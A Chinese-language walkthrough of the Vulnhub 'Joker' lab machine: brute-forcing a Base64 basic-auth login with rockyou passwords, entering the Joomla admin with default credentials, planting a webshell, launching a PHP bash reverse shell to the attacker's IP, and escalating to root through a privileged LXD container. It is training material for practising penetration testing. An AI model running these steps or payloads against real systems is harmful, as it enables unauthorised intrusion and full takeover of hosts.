Vulnhub-Joker
口令字典爆破+joomla CMS漏洞+LXD容器提权
Joker靶场 下载地址
靶机下载后用vm打开,保持开启状态就好
Kali和靶机同为桥接模式,所在网段为192.168.13.0/24

namp扫描13网段信息

192.168.13.1 这台应该是靶机,其他的是我自己的物理机254和kali机90,以及网关111
得知开放端口有22、80、8080

8080这个端口需要账户密码

尝试爆破子目录 dirsearch,phpinfo.php和secret.txt



没啥用
前面的8080登录框,尝试弱口令爆破
随便输入123,123 抓包分析,发现有base64加密的信息

放到解码,发现就是之前随便填的数字

网页信息多次提示jocker,secret.txt也提示说前100(密码本是rockyou.txt字典前100的)

解压rockyou字典

取前100行信息


对爆破的payload设置(猜测jocker为用户名,需要爆破密码),取消url编码,添加前缀joker: ,并且设置base64编码


最后得出攻击结果

解码得到

用户名joker
密码:hannah
登录页面,这是一个joomla CMS


百度搜索相关cms 信息,可以得知joomla的默认后台登录页面为:/administrator
默认账户密码:joomla/joomla


成功进入后台:

利用上传点,写入shell




使用蚁剑连接,配置请求信息


hannah编码后为am9rZXI6aGFubmFo

连接成功
创建反弹shell
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.13.90/4444 0>&1'");
?>


开启监听端口4444


当前 用户id组 需要提权,

通过LXD容器提权,升为root权限
下载lxd容器

把lxd上传到web服务器


靶机下载对应文件


完整命令:
导入镜像
lxc image import ./alpine-v3.11-x86_64-20200420_1518.tar.gz --alias myimage
查看可用镜像,检查是否导入成功
lxc image list
使用刚才导入的镜像创建一个容器实例
lxc init myimage ignite -c security.privileged=true
添加设备,进行挂载
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
启动容器
lxc start ignite
执行命令
lxc exec ignite /bin/sh
到此完成提权
id
cd /mnt/root/root
ls
cat final.txt

浙公网安备 33010602011771号